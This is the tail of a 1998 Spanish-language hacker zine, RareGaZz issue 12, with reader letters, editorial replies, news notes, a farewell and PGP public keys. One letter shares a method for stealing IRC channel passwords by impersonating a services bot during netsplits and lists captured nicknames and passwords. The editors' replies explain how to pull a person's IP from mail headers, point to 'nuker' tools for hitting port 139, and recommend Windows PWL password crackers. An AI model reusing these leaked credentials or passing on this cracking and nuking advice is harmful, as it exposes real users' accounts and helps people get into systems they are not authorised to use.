Set92fHKljQkEPZQlnEPFw8I+HFaEtpl2G+RYu3d4kx+YAoBFVIKe8SEcyGV+CHZ koWefr1Jpe4Q4HKptPYKSJ2JAD8DBRg1b+x0CemQI95I0b4RArKUAKDZW3twA64R JNnYCJeur73lhKMNsgCcCC7R2CH7Sv82p+QImpWii7gi240= =q3+y -----END PGP PUBLIC KEY BLOCK----- ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */*\/*\/*\/*\/*\/*\/*\* / \ *|* CARTAS DEL LECTOR *|* *|* ----------------- *|* \ / *\*/\*/\*/\*/\*/\*/\*/* En el numero #11 no pudimos incluir esta seccion debido a algunos problemas con nuestro buzon de correo, pero dado que es una de las secciones mas inte- resantes del zine, en este numero la hemos vuelto a incluir. ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Holaz de nuevo, en el numero #11 muestra una forma clara de conseguir passwords de usuarios registrados en canales en el irc hispano, la verdad que si funciona y ponganse atentos estos dias porque Scytale se pierde entre los splits y puede que no este en un server y tu te introduzcas en el con el nick de Scytale y los agarras. Si no es asi cambia de server, a veces no estan todos los servers conectados y es diferente. Ok.. See ya. Algunos pass: --- Ejecutarlos en un query a Scyale --- <TOYBOY> auth #amor_sexo_lujuria TOYBOY tecno22 <Marius> auth #canarias marius pepe <Marius> auth #tenerife marius m-jarr <Marius> auth #cafe_canarias marius vern7337 <CopyRighT> auth #emuladores copyright copito <Bertrand> auth #cafe_canarias Bertrand bertin <Bertrand> auth #jazz Bertrand bertin <Drak> auth #romanticos Drack 3527 [ Gracias de parte de RareGaZz y de todos los IRCmaniacos. Si alguno conoce mas trucos o bugs o cualquier cosa interesante sobre el IRC que nos lo envia, ya que hay mucha gente interesada en ello ] ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ primero que todo, felicito por su maravillosa revista; es de lo mejor que he encontrado en la red y en espanol ! les hablo desde colombia, mas especificamente desde cali me gustaria si pueden que me digan lo que saben sobre mi pais y la gente de el que se ha comunicado con ustedes. quisiera pedirles que alguien se escriba por ahi un "aprendiendo lenguaje C mientras paseas por el supermercado" y si no es mucho pedir tambien algo de lenguaje asm. nada complejo algo que entendamos todos y nos sirva como base. [ Agradecemos que te guste nuestra revista y esperamos que sigas leyendo todos nuestros numeros. En cuanto a los cursos de C y ASM los hay a montones. Solo has de buscarlos bien. Prueba en los buscadores. Los cursos de ASM es muy frecuente encontrarlos en las paginas de virii. Has mirado en http://29a.islatortuga.com? ] ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Esste mail es spara comentarles que su ·ltimo n·mero de Raregazzffue un verdadero asco ya que le falto algo, como que lo espa±oles no tienen el mismo toque que los mexicanos, en serio h se sasltaron la secci≤n donde informan de lo ·ltimo. Espero que la revista mejore cada dφa mßs y mßs. [ Bueno, en primer lugar, a ver si aprendes a escribir, porque no se te entiende nada. Y en segundo lugar, solo te dire que respeto que no te guste la revista. No pretendemos que le guste a todo el mundo. Pero NO tienes ningun derecho a decir que es un asco porque la ha editado un español. Resulta que la mayoria de articulos los ha enviado gente de sudamerica. Y ya que eres tan critico, porque no mandas tu algun articulo para 'enseñarnos'? PD: porque enviaste el mail como anonimo? acaso tienes miedo? }:-> ] ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Que tal, muchachos! Su revista esta muy buena. Me encanta. Los mailelo desde argentina. Sus notas y su ideologia son excelentes (EL CHE VIVIRA POR SIEMPRE EN NUESTROS CORAZONES REVOLUCIONARIOS)!!! Les queria hacer 2 preguntas: 1) Como hago para sacar la direccion IP de alguien de un email? 2) Como hago para, con el mirc, en un chat, mandar unb paquete de info a alguien al port 139? [ La direccion IP viene en la cabecera del mail. Si usas el Netscape o cualquier otro programa de correo podras seleccionar que te muestre la cabecera completa y obtendras algo parecido a esto: Received: from ctv1234.ctv.es (195.54.122.254) by host096.a-272.99.66.209.in-addr.arpa with SMTP; 26 May 1998 23:38:00 -0000 bla bla bla Pues el 195.54.122.254 es su IP. Y en cuanto a tu segunda pregunta, puedes buscar nukeadores en astalavista o en cualquier pagina hacker. Los hay a patadas ... incluso en la nuestra :P ] ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Actualicen pronto la Pagina de MP3'S o al menos den enlaaces a los ya existentes.......111111!!!1111. Please........!!!!!!!1 [ Lo siento, pero eso lo llevaba RareTrip. Si alguien conoce links o sites donde encontrarlos que nos avise para poder incluirlos en la web ] ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ para no hechar carreta les voy a preguntar de una: POR FAVOOOOORRRR he encontrado un mundo de armas en formato .c como las uso o que programa uso, por favooor son mi ultima esperanza como ejecuto los malditos archivos .c [ Bien, me imagino que hablaras de linux, porque los fuentes en C que aparecen por Internet no son para MS-DOS ni para Windows. Pues debes compilarlos usando gcc de la siguiente manera: gcc programa.c -o programa Y si esto no te da errores podras ejecuarlo escribiendo: programa Pero te recomiendo que aprendas C y no te limites a compilar y usar el trabajo de otros ] ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ necesito un buen visor de pwls.. el glide y el pwlcrack, no funcionan con versiones de win95b verison 4.00 en adelante no se puede ver los pwls.... algun visor mejorcito???? ya tenia mi cuenta en el usanel ,pero no me llegaban actualizaciones de la revista. espero que en este email si.... bueno es all por el momento. espero reply pornto.... adios... [ En efecto, el glide solo funciona con versiones antiguas de Windows, no con la OEM. Quiero recalcar que el glide funciona 'perfectamente' pero con las versiones anteriores a la OEM de win95. Lo digo porque mucha gente ha escrito diciendo que el glide no funciona o que solo va cuando quiere. Para la version OEM el pwlcrack va muy bien, pero tiene el inconveniente de que debes ejecutarlo en el mismo ordenador, o tambien puedes crearte en tu ordenador un usuario con ese nombrey luego sustituir el PWL, pero tiene el inconveniente de que si el dueño le puso password, no podras entrar. Para eso existen programas como el PWLOSR! o el PWLTOOLS que podras encontrarlos en nuestra pagina. Sirven para averiguar el pass usando diccionarios de palabras, pero te aviso que no funcionan demasiado bien :( ] ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =-_-=-_-=-_-=-_-= | | | NOTICIAS | | -------- | | _ _ _ _ | =- -=- -=- -=- -= ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ En primer lugar queriamos pedir disculpas a Lobo por olvidar incluir su nick en el articulo que nos envio, y que aparecio, en el anterior numero de nuestro zine. Para los que os bajasteis la revista mas tarde ya estaba modificada. Se trata del articulo sobre 'Trucos para el IRC hispano'. ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cada vez el nivel de hacking en paises de habla hispana es mas elevado, pero aun asi debemos mantener un gran respeto por algunos zines de otros paises. Ya se han realizado traducciones de algunos de ellos, como es el caso del Happy Hacker, pero creo que seria muy interesante crear una nueva seccion en la que incluyamos los numeros traducidos de uno de los mejores y mas antiguos zines de internet: Phreak. Pero para ello hace falta vuestra colaboracion. Si quereis que creemos esta seccion debeis ayudarnos con las traducciones. Para ello escribir a raregazz@iname.com indicando en el subject: 'traduccion phreak' y en el mensaje nos poneis vuestro mail y el numero que quereis traducir. Para realizar traducciones es mejor que nos lo aviseis primero no vaya a ser que se traduzca un texto mas de una vez. ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mucha gente nos ha escrito preguntandonos si conociamos algun hacker de su ciudad o pais, asi que he decidido crear una nueva seccion de 'contactos'. A partir de ahora podeis contactar con otros hackers a traves de RareGaZz. Solo teneis que enviarnos un mail que contenga lo siguiente: Subject: contactos Mensaje: mail : vuestraDireccion@de.mail ciudad : vuestra ciudad pais : vuestro pais con quien : con que ciudades o paises quereis contactar Un ejemplo seria: mail : perico@arrakis.es ciudad : Almeria pais : España con quien : con cualquier persona de Andalucia (o de Almeria, o lo que querais poner) Y si nosotros tenemos mas personas de Andalucia que quieran contactar con gente de su region, avisaremos a ambos enviandoles a cada uno la direccion de mail del contrario. `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`' $$$$$$$$$$$$$$$$$ $$ $$ $$ DESPEDIDA $$ $$ ~~~~~~~~~ $$ $$$$$$$$$$$$$$$$$ Una vez mas nos despedimos todos vosotros. Esto es buena señas, porque quiere decir que lo hemos vualto a conseguir. De nuevo RareGaZz saca otro numero. Y gracias a vuestra colaboracion y apoyo, ya llevamos 12. Seguir enviandonos articulos y sugerencias para que pronto podamos poner a vuestra disposicion un nuevo numero. Un saludo a todos de parte de todos los componentes de RareGaZz. Aqui teneis la nueva llave PGP de RareGaZz: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP for Personal Privacy 5.0 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 4XwaDg== =crAP -----END PGP PUBLIC KEY BLOCK----- Y para los que usais la versin 2.6.3 en vez de la 5, podeis enviar vuestros mails usando esta otra: Type Bits/KeyID Date User ID pub 2048/DF9FDDF1 1997/09/06 GuyBrush -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQENAzQRC6EAAAEIANn1u+zQmbcctlaQzpkDUtWWWgbV77IS/AcKbxcRDpV0gEO+ kosiVsRsNVVGW49G0N9QvJBRydpS5icuWUs5ZRZX8AZmV09JGVfIKODAZ+Ns8Lk4 U/fxxfOhTNDX5cOZzEI02fpSeoUfHaVi6Te115isTMlXD+X46cS1AnNYQePB//xf GhxriqVq3mkqb1S9gXa/4bc9IxkFiA+shzUUxXFZP/M92m0q8M16TPeoVFuxhtZ3 A2Gzkvd2UQbNRDo78W6QqG9cn+q/UqhEggEqK/vwGVAvlY/h5Gr3mRHX3XxM8Ey6 bH0gHmgokxAQBWXtxGYLLp1BhN/pzn2ekN+f3fEABRG0CEd1eUJydXNoiQEVAwUQ NDwPq859npDfn93xAQE2Dgf+OhHFL4G5oh5AyN1irHNReeMsy51wbSwSDVYUWv7N 4f+t0opvch+FhOY1aRMkvm/+eeMW4/OrotH1uUHMJYkH8MoOM0+9BuwNVGwe0jUg hPz9cZtPwSaslpqDIagG3LSb246Jb+H0HWWZh6Gc3AiFGbJr9QcNcQ7uRZwf7MEC BdlH1v0WZxhfH0vrmWAwbC9dbIIfVOmvTY7YfQNpjtZ3fcRrFLf7rMvn/H5HEEEJ 6uwFF5QIBmemb1ptcZ+8C96kDMWNig9j/GuVTF4HA/2YZYHjKa4ljCx2GYPXp2PU dl5Ce4UHDdbb051vf3D1ORwBjj86OgIUVtY3MFsfk9pjEg== =hMoY -----END PGP PUBLIC KEY BLOCK----- RareGaZz '98 ~~~~~~~~~~~~